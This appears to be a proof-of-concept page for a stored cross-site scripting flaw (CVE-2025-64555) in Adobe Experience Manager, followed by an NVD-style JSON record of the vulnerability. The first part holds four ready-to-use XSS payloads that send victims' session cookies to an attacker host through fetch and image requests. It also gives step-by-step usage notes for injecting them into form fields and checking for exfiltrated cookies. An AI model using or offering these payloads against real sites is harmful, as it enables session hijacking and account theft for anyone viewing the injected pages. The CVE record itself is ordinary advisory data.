CVE-2025-64555

<!-- CVE-2025-64555 Stored XSS PoC for Adobe Experience Manager --> <!-- This PoC demonstrates the XSS vulnerability in AEM form fields --> <!-- Step 1: Inject malicious script into a vulnerable form field --> <!-- Use this payload when submitting form data in AEM --> <script> // Steal session cookies var stolenCookies = document.cookie; // Send stolen data to attacker-controlled server fetch('https://attacker.com/steal?c=' + encodeURIComponent(stolenCookies), { method: 'GET', mode: 'no-cors' }); // Alternative payload - alert demonstration alert('XSS Vulnerability - CVE-2025-64555'); </script> <!-- Step 2: Image tag XSS payload (bypasses some filters) --> <img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie"> <!-- Step 3: SVG XSS payload --> <svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))> <!-- Step 4: Event handler XSS --> <body onload="fetch('https://attacker.com/capture?session='+document.cookie)"> <!-- Usage Notes: 1. Identify form fields in Adobe Experience Manager 2. Submit the payload as field value 3. When any user views the page containing the field, script executes 4. Check for successful cookie/log data exfiltration --> <!-- Remediation: Upgrade to Adobe Experience Manager 6.5.24 or later -->

{"cve": {"id": "CVE-2025-64555", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:17.433", "lastModified": "2025-12-12T19:56:08.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}